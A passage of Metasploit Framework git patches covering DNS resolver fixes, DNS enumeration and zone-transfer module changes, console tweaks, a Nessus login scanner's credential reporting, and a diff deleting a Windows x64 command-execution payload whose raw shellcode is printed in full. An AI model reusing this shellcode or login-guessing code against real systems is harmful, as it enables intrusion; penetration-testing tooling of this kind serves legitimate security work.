+              socket.connect(sockaddr)
+              @logger.info "Contacting nameserver #{ns} port #{@config[:port]}"
+              socket.write(length+packet_data)
+              got_something = false
+              loop do
+                buffer = ""
+                begin
                   ans = socket.recv(Net::DNS::INT16SZ)
-                  if ans.size == 0
-                    if got_something
-                      break #Proper exit from loop
-                    else
-                      @logger.warn "Connection reset to nameserver #{ns}, trying next."
-                      throw "next nameserver"
-                    end
-                  end
-                  got_something = true
-                  len = ans.unpack("n")[0]
-
-                  @logger.info "Receiving #{len} bytes..."
-
-                  if len == 0
-                    @logger.warn "Receiving 0 length packet from nameserver #{ns}, trying next."
-                    throw "next nameserver"
-                  end
-
-                  while (buffer.size < len)
-                    left = len - buffer.size
-                    temp,from = socket.recvfrom(left)
-                    buffer += temp
-                  end
-
-                  unless buffer.size == len
-                    @logger.warn "Malformed packet from nameserver #{ns}, trying next."
-                    throw "next nameserver"
-                  end
-                  if block_given?
-                    yield [buffer,["",@config[:port],ns.to_s,ns.to_s]]
+                rescue ::Errno::ECONNRESET
+                  ans = ""
+                end
+                if ans.size == 0
+                  if got_something
+                    break #Proper exit from loop
                   else
-                    return [buffer,["",@config[:port],ns.to_s,ns.to_s]]
+                    @logger.warn "Connection reset to nameserver #{ns}, trying next."
+                    raise NextNameserver
                   end
                 end
+                got_something = true
+                len = ans.unpack("n")[0]
+
+                @logger.info "Receiving #{len} bytes..."
+
+                if len == 0
+                  @logger.warn "Receiving 0 length packet from nameserver #{ns}, trying next."
+                  raise NextNameserver
+                end
+
+                while (buffer.size < len)
+                  left = len - buffer.size
+                  temp,from = socket.recvfrom(left)
+                  buffer += temp
+                end
+
+                unless buffer.size == len
+                  @logger.warn "Malformed packet from nameserver #{ns}, trying next."
+                  raise NextNameserver
+                end
+                if block_given?
+                  yield [buffer,["",@config[:port],ns.to_s,ns.to_s]]
+                else
+                  return [buffer,["",@config[:port],ns.to_s,ns.to_s]]
+                end
               end
             end
+          rescue NextNameserver
+            next
           rescue Timeout::Error
             @logger.warn "Nameserver #{ns} not responding within TCP timeout, trying next one"
             next
diff --git a/lib/net/dns/rr.rb b/lib/net/dns/rr.rb
index 1629c3f3a7..7183f95657 100644
--- a/lib/net/dns/rr.rb
+++ b/lib/net/dns/rr.rb
@@ -1,6 +1,6 @@
 # -*- coding: binary -*-
 #
-#       $Id: RR.rb,v 1.19 2006/07/28 07:33:36 bluemonk Exp $    
+#       $Id: RR.rb,v 1.19 2006/07/28 07:33:36 bluemonk Exp $
 #
 
 require 'net/dns/names/names'
@@ -13,37 +13,37 @@ require 'net/dns/rr/classes'
 end
 
 module Net # :nodoc:
-  module DNS 
-    
+  module DNS
+
     # =Name
     #
     # Net::DNS::RR - DNS Resource Record class
     #
     # =Synopsis
-    # 
+    #
     #   require 'net/dns/rr'
     #
     # =Description
-    # 
-    # The Net::DNS::RR is the base class for DNS Resource 
+    #
+    # The Net::DNS::RR is the base class for DNS Resource
     # Record (RR) objects. A RR is a pack of data that represents
-    # resources for a DNS zone. The form in which this data is 
+    # resources for a DNS zone. The form in which this data is
     # shows can be drawed as follow:
     #
     #   "name  ttl  class  type  data"
-    # 
+    #
     # The +name+ is the name of the resource, like an canonical
     # name for an +A+ record (internet ip address). The +ttl+ is the
-    # time to live, expressed in seconds. +type+ and +class+ are 
+    # time to live, expressed in seconds. +type+ and +class+ are
     # respectively the type of resource (+A+ for ip addresses, +NS+
-    # for nameservers, and so on) and the class, which is almost 
+    # for nameservers, and so on) and the class, which is almost
     # always +IN+, the Internet class. At the end, +data+ is the
-    # value associated to the name for that particular type of 
+    # value associated to the name for that particular type of
     # resource record. An example:
     #
     #   # A record for IP address
     #   "www.example.com  86400  IN  A  172.16.100.1"
-    #   
+    #
     #   # NS record for name server
     #   "www.example.com  86400  IN  NS  ns.example.com"
     #
@@ -61,20 +61,20 @@ module Net # :nodoc:
     # * RRDataError: Error in parsing binary data, maybe from a malformed packet
     #
     # =Copyright
-    # 
+    #
     # Copyright (c) 2006 Marco Ceresa
     #
-    # All rights reserved. This program is free software; you may redistribute 
+    # All rights reserved. This program is free software; you may redistribute
     # it and/or modify it under the same terms as Ruby itself.
     #
     class RR
       include Net::DNS::Names
-      
+
       # Regexp matching an RR string
       RR_REGEXP = Regexp.new("^\\s*(\\S+)\\s*(\\d+)?\\s+(" +
-                               Net::DNS::RR::Classes.regexp + 
+                               Net::DNS::RR::Classes.regexp +
                                "|CLASS\\d+)?\\s*(" +
-                               Net::DNS::RR::Types.regexp + 
+                               Net::DNS::RR::Types.regexp +
                                "|TYPE\\d+)?\\s*(.*)$", Regexp::IGNORECASE, 'n')
 
       # Dimension of the sum of class, type, TTL and rdlength fields in a
@@ -85,13 +85,13 @@ module Net # :nodoc:
       attr_reader :name
       # TTL time (in seconds) of the RR
       attr_reader :ttl
-      # Data belonging to that appropriate class, 
+      # Data belonging to that appropriate class,
       # not to be used (use real accessors instead)
       attr_reader :rdata
-      
+
       # Create a new instance of Net::DNS::RR class, or an instance of
       # any of the subclass of the appropriate type.
-      # 
+      #
       # Argument can be a string or an hash. With a sting, we can pass
       # a RR resource record in the canonical format:
       #
@@ -101,12 +101,12 @@ module Net # :nodoc:
       #   txt   = Net::DNS::RR.new('baz.example.com 3600 HS TXT "text record"')
       #
       # Incidentally, +a+, +mx+, +cname+ and +txt+ objects will be instances of
-      # respectively Net::DNS::RR::A, Net::DNS::RR::MX, Net::DNS::RR::CNAME and 
+      # respectively Net::DNS::RR::A, Net::DNS::RR::MX, Net::DNS::RR::CNAME and
       # Net::DNS::RR::TXT classes.
       #
-      # The name and RR data are required; all other informations are optional.  
+      # The name and RR data are required; all other informations are optional.
       # If omitted, the +TTL+ defaults to 10800, +type+ default to +A+ and the RR class
-      # defaults to +IN+.  Omitting the optional fields is useful for creating the 
+      # defaults to +IN+.  Omitting the optional fields is useful for creating the
       # empty RDATA sections required for certain dynamic update operations.
       # All names must be fully qualified.  The trailing dot (.) is optional.
       #
@@ -125,12 +125,12 @@ module Net # :nodoc:
       #                 :rdata => "10.1.2.3"
       #         )
       #
-      # Name and data are required; all the others fields are optionals like 
-      # we've seen before. The data field can be specified either with the 
+      # Name and data are required; all the others fields are optionals like
+      # we've seen before. The data field can be specified either with the
       # right name of the resource (+:address+ in the example above) or with
       # the generic key +:rdata+. Consult documentation to find the exact name
       # for the resource in each subclass.
-      # 
+      #
       def initialize(arg)
         case arg
         when String
@@ -157,18 +157,18 @@ module Net # :nodoc:
       #
       # This method is used when parsing a binary packet by the Packet
       # class.
-      # 
+      #
       def RR.parse(data)
         o = allocate
         obj,offset = o.send(:new_from_binary, data, 0)
         return obj
       end
-      
-      # Same as RR.parse, but takes an entire packet binary data to 
+
+      # Same as RR.parse, but takes an entire packet binary data to
       # perform name expansion. Default when analizing a packet
       # just received from a network stream.
       #
-      # Return an instance of appropriate class and the offset 
+      # Return an instance of appropriate class and the offset
       # pointing at the end of the data parsed.
       #
       def RR.parse_packet(data,offset)
@@ -176,12 +176,12 @@ module Net # :nodoc:
         o.send(:new_from_binary,data,offset)
       end
 
-      # Return the RR object in binary data format, suitable 
-      # for using in network streams, with names compressed. 
+      # Return the RR object in binary data format, suitable
+      # for using in network streams, with names compressed.
       # Must pass as arguments the offset inside the packet
       # and an hash of compressed names.
       #
-      # This method is to be used in other classes and is 
+      # This method is to be used in other classes and is
       # not intended for user space programs.
       #
       # TO FIX in one of the future releases
@@ -193,8 +193,8 @@ module Net # :nodoc:
         offset += Net::DNS::RRFIXEDSZ
         return str,offset,names
       end
-      
-      # Return the RR object in binary data format, suitable 
+
+      # Return the RR object in binary data format, suitable
       # for using in network streams.
       #
       #   raw_data = rr.data
@@ -205,17 +205,17 @@ module Net # :nodoc:
         str = pack_name(@name)
         return str + [type,cls,@ttl,@rdlength].pack("n2 N n") + get_data
       end
-      
-      # Canonical inspect method    
+
+      # Canonical inspect method
       #
       #   mx = Net::DNS::RR.new("example.com. 7200 MX 10 mailhost.example.com.")
       #     #=> example.com.            7200    IN      MX      10 mailhost.example.com.
       #
       def inspect
-        data = get_inspect 
+        data = get_inspect
         # Returns the preformatted string
         if @name.size < 24
-          [@name, @ttl.to_s, @cls.to_s, @type.to_s, 
+          [@name, @ttl.to_s, @cls.to_s, @type.to_s,
             data].pack("A24 A8 A8 A8 A*")
         else
           to_a.join("   ")
@@ -241,26 +241,26 @@ module Net # :nodoc:
       def to_a
         [@name,@ttl,@cls.to_s,@type.to_s,get_inspect]
       end
-      
+
       # Type accessor
       def type
         @type.to_s
       end
-      
+
       # Class accessor
       def cls
         @cls.to_s
       end
-      
+
       private
-      
+
       #---
       # New RR with argument in string form
       #---
       def new_from_string(rrstring)
 
         unless rrstring =~ RR_REGEXP
-          raise RRArgumentError, 
+          raise RRArgumentError,
           "Format error for RR string (maybe CLASS and TYPE not valid?)"
         end
 
@@ -270,19 +270,19 @@ module Net # :nodoc:
         rescue NoMethodError
           raise RRArgumentError, "Missing name field in RR string #{rrstring}"
         end
-        
+
         # Time to live for RR, default 3 hours
         @ttl = $2 ? $2.to_i : 10800
-        
+
         # RR class, default to IN
         @cls = Net::DNS::RR::Classes.new $3
-        
+
         # RR type, default to A
         @type = Net::DNS::RR::Types.new $4
-        
-        # All the rest is data 
-        @rdata = $5 ? $5.strip : ""  
-        
+
+        # All the rest is data
+        @rdata = $5 ? $5.strip : ""
+
         if self.class == Net::DNS::RR
           (eval "Net::DNS::RR::#@type").new(rrstring)
         else
@@ -290,11 +290,11 @@ module Net # :nodoc:
           self.class
         end
       end
-      
+
       def new_from_hash(args)
-        
-        # Name field is mandatory   
-        unless args.has_key? :name 
+
+        # Name field is mandatory
+        unless args.has_key? :name
           raise RRArgumentError, "RR argument error: need at least RR name"
         end
 
@@ -302,7 +302,7 @@ module Net # :nodoc:
         @ttl   = args[:ttl] ? args[:ttl].to_i : 10800 # Default 3 hours
         @type  = Net::DNS::RR::Types.new args[:type]
         @cls  = Net::DNS::RR::Classes.new args[:cls]
-        
+
         @rdata = args[:rdata] ? args[:rdata].strip : ""
         @rdlength = args[:rdlength] || @rdata.size
 
@@ -323,6 +323,7 @@ module Net # :nodoc:
         if self.class == Net::DNS::RR
           temp = dn_expand(data,offset)[1]
           type = Net::DNS::RR::Types.new data.unpack("@#{temp} n")[0]
+          return unless Net::DNS::RR.const_defined?(type.to_s)
           (eval "Net::DNS::RR::#{type}").parse_packet(data,offset)
         else
           @name,offset = dn_expand(data,offset)
@@ -338,7 +339,7 @@ module Net # :nodoc:
 #      rescue StandardError => err
 #        raise RRDataError, "Caught exception, maybe packet malformed: #{err}"
       end
-      
+
       # Methods to be overridden by subclasses
       def subclass_new_from_array(arr)
       end
@@ -369,9 +370,9 @@ module Net # :nodoc:
           return o
         end
       end
-            
+
     end # class RR
-    
+
   end # module DNS
 end # module Net
 
@@ -381,10 +382,10 @@ class RRDataError < StandardError # :nodoc:
 end
 
 module ExtendHash # :nodoc:
-  
-  # Performs a sort of group difference 
+
+  # Performs a sort of group difference
   # operation on hashes or arrays
-  # 
+  #
   #   a = {:a=>1,:b=>2,:c=>3}
   #   b = {:a=>1,:b=>2}
   #   c = [:a,:c]
diff --git a/modules/auxiliary/gather/enum_dns.rb b/modules/auxiliary/gather/enum_dns.rb
index a9188e22f6..7c19308176 100644
--- a/modules/auxiliary/gather/enum_dns.rb
+++ b/modules/auxiliary/gather/enum_dns.rb
@@ -296,6 +296,7 @@ class Metasploit3 < Msf::Auxiliary
         tl << framework.threads.spawn("Module(#{self.refname})-#{ip}", false, ip.dup) do |tip|
           begin
             query = @res.query(tip)
+            raise ::Rex::ConnectionError
             query.each_ptr do |addresstp|
               print_status("Hostname: #{addresstp} IP address: #{tip.to_s}")
               report_note(:host => @nsinuse.to_s,
@@ -342,12 +343,13 @@ class Metasploit3 < Msf::Auxiliary
     srvrcd.each do |srvt|
       trg = "#{srvt}#{dom}"
       query = @res.query(trg , Net::DNS::SRV)
-      if query
-        query.answer.each do |srv|
-          print_status("SRV Record: #{trg} Host: #{srv.host} Port: #{srv.port} Priority: #{srv.priority}") if srv.type != "CNAME"
-        end
+      next unless query
+      query.answer.each do |srv|
+        next if srv.type == "CNAME"
+        print_status("SRV Record: #{trg} Host: #{srv.host} Port: #{srv.port} Priority: #{srv.priority}")
       end
     end
+    print_status("Done")
   end
 
   # For Performing Zone Transfers
@@ -359,7 +361,7 @@ class Metasploit3 < Msf::Auxiliary
     end
     @res.tcp_timeout=15
     query = @res.query(target, "NS")
-    if (query.answer.length != 0)
+    if query && query.answer.length != 0
       (query.answer.select { |i| i.class == Net::DNS::RR::NS}).each do |nsrcd|
         print_status("Testing nameserver: #{nsrcd.nsdname}")
         nssrvquery = @res.query(nsrcd.nsdname, "A")
@@ -372,7 +374,12 @@ class Metasploit3 < Msf::Auxiliary
           @res.nameserver=(nssrvip)
           @nsinuse = nssrvip
           zone = []
-          zone = @res.axfr(target)
+
+          begin
+            zone = @res.axfr(target)
+          rescue ::NoResponseError
+          end
+
           if zone.length != 0
             print_status("Zone transfer successful")
             report_note(:host => nssrvip,
@@ -381,7 +388,7 @@ class Metasploit3 < Msf::Auxiliary
               :port => 53 ,
               :type => 'dns.enum',
               :update => :unique_data,
-              :data => "Zone transfer successful")
+              :data => zone)
             # Prints each record according to its type
             zone.each do |response|
               response.answer.each do |rr|
@@ -389,85 +396,22 @@ class Metasploit3 < Msf::Auxiliary
                 case rr.type
                 when "A"
                   print_status("Name: #{rr.name} IP address: #{rr.address} Record: A ")
-                  report_note(:host => nssrvip,
-                    :proto => 'udp',
-                    :sname => 'dns',
-                    :port => 53 ,
-                    :type => 'dns.enum',
-                    :update => :unique_data,
-                    :data => "#{rr.address.to_s},#{rr.name},A")
                 when "SOA"
                   print_status("Name: #{rr.mname} Record: SOA")
-                  report_note(:host => nssrvip,
-                    :proto => 'udp',
-                    :sname => 'dns',
-                    :port => 53 ,
-                    :type => 'dns.enum',
-                    :update => :unique_data,
-                    :data => "#{rr.name},SOA")
                 when "MX"
                   print_status("Name: #{rr.exchange} Preference: #{rr.preference} Record: MX")
-                  report_note(:host => nssrvip,
-                    :proto => 'udp',
-                    :sname => 'dns',
-                    :port => 53 ,
-                    :type => 'dns.enum',
-                    :update => :unique_data,
-                    :data => "#{rr.exchange},MX")
                 when "CNAME"
                   print_status("Name: #{rr.cname} Record: CNAME")
-                  report_note(:host => nssrvip,
-                    :proto => 'udp',
-                    :sname => 'dns',
-                    :port => 53 ,
-                    :type => 'dns.enum',
-                    :update => :unique_data,
-                    :data => "#{rr.cname},CNAME")
                 when "HINFO"
                   print_status("CPU: #{rr.cpu} OS: #{rr.os} Record: HINFO")
-                  report_note(:host => nssrvip,
-                    :proto => 'udp',
-                    :sname => 'dns',
-                    :port => 53 ,
-                    :type => 'dns.enum',
-                    :update => :unique_data,
-                    :data => "CPU:#{rr.cpu},OS:#{rr.os},HINFO")
                 when "AAAA"
                   print_status("IPv6 Address: #{rr.address} Record: AAAA")
-                  report_note(:host => nssrvip,
-                    :proto => 'udp',
-                    :sname => 'dns',
-                    :port => 53 ,
-                    :type => 'dns.enum',
-                    :update => :unique_data,
-                    :data => "#{rr.address.to_s}, AAAA")
                 when "NS"
                   print_status("Name: #{rr.nsdname} Record: NS")
-                  report_note(:host =>  nssrvip,
-                    :proto => 'udp',
-                    :sname => 'dns',
-                    :port => 53 ,
-                    :type => 'dns.enum',
-                    :update => :unique_data,
-                    :data => "#{rr.nsdname},NS")
                 when "TXT"
                   print_status("Text: #{rr.inspect}")
-                  report_note(:host =>  nssrvip,
-                    :proto => 'udp',
-                    :sname => 'dns',
-                    :port => 53 ,
-                    :type => 'dns.enum',
-                    :update => :unique_data,
-                    :data => rr.inspect)
                 when "SRV"
                   print_status("Host: #{rr.host} Port: #{rr.port} Priority: #{rr.priority} Record: SRV")
-                  report_note(:host =>  nssrvip,
-                    :proto => 'udp',
-                    :sname => 'dns',
-                    :port => 53 ,
-                    :type => 'dns.enum',
-                    :update => :unique_data,
-                    :data => "#{rr.host},#{rr.port},#{rr.priority},SRV")
                 end
                 rescue ActiveRecord::RecordInvalid
                   # Do nothing. Probably tried to store :host => 127.0.0.1

From fe09d9888e54d55a9e4a3f2cd704dd34a8ec869a Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Sat, 6 Jun 2015 14:30:42 -0500
Subject: [PATCH 0346/1013] Small rework of the spinners, clear the line when
 done

---
 lib/metasploit/framework/command/console.rb | 16 +++++++++++++---
 lib/msf/ui/console/driver.rb                |  2 +-
 2 files changed, 14 insertions(+), 4 deletions(-)

diff --git a/lib/metasploit/framework/command/console.rb b/lib/metasploit/framework/command/console.rb
index 82a4c892e9..797d8dcdc0 100644
--- a/lib/metasploit/framework/command/console.rb
+++ b/lib/metasploit/framework/command/console.rb
@@ -19,11 +19,21 @@ class Metasploit::Framework::Command::Console < Metasploit::Framework::Command::
     return if Rex::Compat.is_cygwin
     return if $msf_spinner_thread
     $msf_spinner_thread = Thread.new do
-      $stderr.print "[*] Starting the Metasploit Framework console..."
+      base_line = "[*] Starting the Metasploit Framework console..."
+      cycle = 0
       loop do
         %q{/-\|}.each_char do |c|
-          $stderr.print c
-          $stderr.print "\b"
+          status = "#{base_line}#{c}\r"
+          cycle += 1
+          off    = cycle % base_line.length
+          case status[off, 1]
+          when /[a-z]/
+            status[off, 1] = status[off, 1].upcase
+          when /[A-Z]/
+            status[off, 1] = status[off, 1].downcase
+          end
+          $stderr.print status
+          ::IO.select(nil, nil, nil, 0.10)
         end
       end
     end
diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb
index 922d3c384c..b25d827a4e 100644
--- a/lib/msf/ui/console/driver.rb
+++ b/lib/msf/ui/console/driver.rb
@@ -547,7 +547,7 @@ class Driver < Msf::Ui::Driver
 
     if $msf_spinner_thread
       $msf_spinner_thread.kill
-      $stderr.print "\n"
+      $stderr.print "\r" + (" " * 60) + "\n"
     end
 
     run_single("banner") unless opts['DisableBanner']

From f761d411c4182feeee4ebb970a82f5900eaf5258 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Sat, 6 Jun 2015 15:56:42 -0500
Subject: [PATCH 0347/1013] Adjust line clearing to cover only the text

---
 lib/msf/ui/console/driver.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb
index b25d827a4e..0810688fa4 100644
--- a/lib/msf/ui/console/driver.rb
+++ b/lib/msf/ui/console/driver.rb
@@ -547,7 +547,7 @@ class Driver < Msf::Ui::Driver
 
     if $msf_spinner_thread
       $msf_spinner_thread.kill
-      $stderr.print "\r" + (" " * 60) + "\n"
+      $stderr.print "\r" + (" " * 50) + "\n"
     end
 
     run_single("banner") unless opts['DisableBanner']

From bd3690838315601733023aac9732a2fdb1e0637f Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Sat, 6 Jun 2015 17:07:03 -0500
Subject: [PATCH 0348/1013] Fix #5500 by checking for
 session.respond_to?(:response_timeout)

---
 lib/msf/ui/console/command_dispatcher/core.rb | 28 +++++++++++++------
 1 file changed, 20 insertions(+), 8 deletions(-)

diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index e07d71fa49..f395805f99 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -1778,8 +1778,8 @@ class Core
             end
           ensure
             # Restore timeout for each session
-            if session.respond_to?(:response_timeout)
-              session.response_timeout = last_known_timeout if last_known_timeout
+            if session.respond_to?(:response_timeout) && last_known_timeout
+              session.response_timeout = last_known_timeout
             end
           end
           # If the session isn't a meterpreter or shell type, it
@@ -1801,7 +1801,9 @@ class Core
           begin
             session.kill
           ensure
-            session.response_timeout = last_known_timeout if last_known_timeout
+            if session.respond_to?(:response_timeout) && last_known_timeout
+              session.response_timeout = last_known_timeout
+            end
           end
         else
           print_error("Invalid session identifier: #{sess_id}")
@@ -1819,7 +1821,9 @@ class Core
           begin
             session.kill
           ensure
-            session.response_timeout = last_known_timeout if last_known_timeout
+            if session.respond_to?(:response_timeout) && last_known_timeout
+              session.response_timeout = last_known_timeout
+            end
           end
         end
       end
@@ -1837,7 +1841,9 @@ class Core
           begin
             session.detach
           ensure
-            session.response_timeout = last_known_timeout if last_known_timeout
+            if session.respond_to?(:response_timeout) && last_known_timeout
+              session.response_timeout = last_known_timeout
+            end
           end
         end
       end
@@ -1855,7 +1861,9 @@ class Core
           self.active_session = nil
           driver.input.reset_tab_completion if driver.input.supports_readline
         ensure
-          session.response_timeout = last_known_timeout if last_known_timeout
+          if session.respond_to?(:response_timeout) && last_known_timeout
+            session.response_timeout = last_known_timeout
+          end
         end
       end
     when 'scriptall'
@@ -1893,7 +1901,9 @@ class Core
               end
             end
           ensure
-            session.response_timeout = last_known_timeout if last_known_timeout
+            if session.respond_to?(:response_timeout) && last_known_timeout
+              session.response_timeout = last_known_timeout
+            end
           end
         else
           print_error("Invalid session identifier: #{sess_id}")
@@ -1919,7 +1929,9 @@ class Core
               next
             end
           ensure
-            session.response_timeout = last_known_timeout if last_known_timeout
+            if session.respond_to?(:response_timeout) && last_known_timeout
+              session.response_timeout = last_known_timeout
+            end
           end
         end
 

From a46510465db6f1f605e8c0db4b6cb456c1dc66dd Mon Sep 17 00:00:00 2001
From: RageLtMan <rageltman [at] sempervictus>
Date: Sun, 7 Jun 2015 02:58:31 -0400
Subject: [PATCH 0349/1013] Fix older Windows payloads to not require UUID

Default Windows payload to not include_send_uuid for compatibility.
---
 lib/msf/core/payload/windows.rb | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/lib/msf/core/payload/windows.rb b/lib/msf/core/payload/windows.rb
index f05324a63a..c0f764629c 100644
--- a/lib/msf/core/payload/windows.rb
+++ b/lib/msf/core/payload/windows.rb
@@ -163,5 +163,13 @@ module Msf::Payload::Windows
     @@exit_types.dup
   end
 
+  #
+  # By default, we don't want to send the UUID, but we'll send
+  # for certain payloads if requested.
+  #
+  def include_send_uuid
+    false
+  end
+
 end
 

From 537dc6e2181ce292286ccd3ca3fc7ac058296d26 Mon Sep 17 00:00:00 2001
From: RageLtMan <rageltman [at] sempervictus>
Date: Sun, 7 Jun 2015 11:42:24 -0400
Subject: [PATCH 0350/1013] Update Payload Cached Sizes fails in PSH Script

When attempting to update cached payload sizes which utilize the
Rex::Powershell functionality, the BRE block which appropriates
initial code is called with the 'code' variable being a nil which
results in:

```
lib/rex/powershell/script.rb:40:in `initialize': no implicit
conversion of nil into String (TypeError)
```

This throws a conditional into the File.open call which presents an
empty string instead of a nil. This still results in the rescue
block having to catch the exception, but manages to keep the
payload size updating script happy an retains consistent
behavior.
---
 lib/rex/powershell/script.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/rex/powershell/script.rb b/lib/rex/powershell/script.rb
index cfde3bb887..83297447ab 100644
--- a/lib/rex/powershell/script.rb
+++ b/lib/rex/powershell/script.rb
@@ -37,7 +37,7 @@ module Powershell
 
       begin
         # Open code file for reading
-        fd = ::File.new(code, 'rb')
+        fd = ::File.new(code || '', 'rb')
         while (line = fd.gets)
           @code << line
         end

From 20b605e7cbecb8384efdaa6a6fc07484e94906a4 Mon Sep 17 00:00:00 2001
From: benpturner <benpturner@yahoo.com>
Date: Sun, 7 Jun 2015 18:11:11 +0100
Subject: [PATCH 0351/1013] Remove duplicate exec

---
 lib/msf/core/payload/windows/x64/exec.rb | 65 ------------------------
 1 file changed, 65 deletions(-)
 delete mode 100644 lib/msf/core/payload/windows/x64/exec.rb

diff --git a/lib/msf/core/payload/windows/x64/exec.rb b/lib/msf/core/payload/windows/x64/exec.rb
deleted file mode 100644
index 547ca5cfe4..0000000000
--- a/lib/msf/core/payload/windows/x64/exec.rb
+++ /dev/null
@@ -1,65 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-
-require 'msf/core'
-
-
-module Metasploit3
-
-  CachedSize = 268
-
-  include Msf::Payload::Windows
-  include Msf::Payload::Single
-
-  def initialize(info = {})
-    super(merge_info(info,
-      'Name'          => 'Windows x64 Execute Command',
-      'Description'   => 'Execute an arbitrary command (Windows x64)',
-      'Author'        => [ 'sf' ],
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'win',
-      'Arch'          => ARCH_X86_64,
-      'Payload'       =>
-        {
-          'Offsets' =>
-            {
-              'EXITFUNC' => [ 229, 'V' ]
-            },
-          'Payload' =>
-            "\xFC\x48\x83\xE4\xF0\xE8\xC0\x00\x00\x00\x41\x51\x41\x50\x52\x51" +
-            "\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52" +
-            "\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0" +
-            "\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xED" +
-            "\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C\x48\x01\xD0\x8B\x80\x88" +
-            "\x00\x00\x00\x48\x85\xC0\x74\x67\x48\x01\xD0\x50\x8B\x48\x18\x44" +
-            "\x8B\x40\x20\x49\x01\xD0\xE3\x56\x48\xFF\xC9\x41\x8B\x34\x88\x48" +
-            "\x01\xD6\x4D\x31\xC9\x48\x31\xC0\xAC\x41\xC1\xC9\x0D\x41\x01\xC1" +
-            "\x38\xE0\x75\xF1\x4C\x03\x4C\x24\x08\x45\x39\xD1\x75\xD8\x58\x44" +
-            "\x8B\x40\x24\x49\x01\xD0\x66\x41\x8B\x0C\x48\x44\x8B\x40\x1C\x49" +
-            "\x01\xD0\x41\x8B\x04\x88\x48\x01\xD0\x41\x58\x41\x58\x5E\x59\x5A" +
-            "\x41\x58\x41\x59\x41\x5A\x48\x83\xEC\x20\x41\x52\xFF\xE0\x58\x41" +
-            "\x59\x5A\x48\x8B\x12\xE9\x57\xFF\xFF\xFF\x5D\x48\xBA\x01\x00\x00" +
-            "\x00\x00\x00\x00\x00\x48\x8D\x8D\x01\x01\x00\x00\x41\xBA\x31\x8B" +
-            "\x6F\x87\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x41\xBA\xA6\x95\xBD\x9D\xFF" +
-            "\xD5\x48\x83\xC4\x28\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47" +
-            "\x13\x72\x6F\x6A\x00\x59\x41\x89\xDA\xFF\xD5"
-        }
-      ))
-    register_options(
-      [
-        OptString.new('CMD', [ true, "The command string to execute" ]),
-      ], self.class )
-  end
-
-  def generate
-    return super + command_string + "\x00"
-  end
-
-  def command_string
-    return datastore['CMD'] || ''
-  end
-
-end

From 245c76374d6a44ae6ae4ada9749beaecefdc7775 Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Mon, 8 Jun 2015 14:40:15 +0500
Subject: [PATCH 0352/1013] Update nessus_xmlrpc_logic to use the new creds API

---
 .../scanner/nessus/nessus_xmlrpc_login.rb     | 34 ++++++++++++++++++-
 1 file changed, 33 insertions(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb
index 018fa7ce17..149782f31e 100644
--- a/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb
+++ b/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb
@@ -110,11 +110,43 @@ class Metasploit3 < Msf::Auxiliary
           :active => true,
           :type => 'password'}
 
-        report_auth_info(report_hash)
+        report_cred(
+          ip: datastore['RHOST'],
+          port: datastore['RPORT'],
+          service_name: 'nessus-xmlrpc',
+          user: user,
+          password: pass
+        )
         return :next_user
       end
     end
     vprint_error("FAILED LOGIN. '#{user}' : '#{pass}'")
     return :skip_pass
   end
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
 end

From 3279518bbd040006ce39d038df69b2c1a418151b Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Mon, 8 Jun 2015 14:58:22 +0500
Subject: [PATCH 0353/1013] Move VMware modules to the VMware directory

---
 .../auxiliary/scanner/{http => vmware}/vmware_server_dir_trav.rb  | 0
 .../scanner/{http => vmware}/vmware_update_manager_traversal.rb   | 0
 2 files changed, 0 insertions(+), 0 deletions(-)
 rename modules/auxiliary/scanner/{http => vmware}/vmware_server_dir_trav.rb (100%)
 rename modules/auxiliary/scanner/{http => vmware}/vmware_update_manager_traversal.rb (100%)

diff --git a/modules/auxiliary/scanner/http/vmware_server_dir_trav.rb b/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb
similarity index 100%
rename from modules/auxiliary/scanner/http/vmware_server_dir_trav.rb
rename to modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb
diff --git a/modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb b/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb
similarity index 100%
rename from modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb
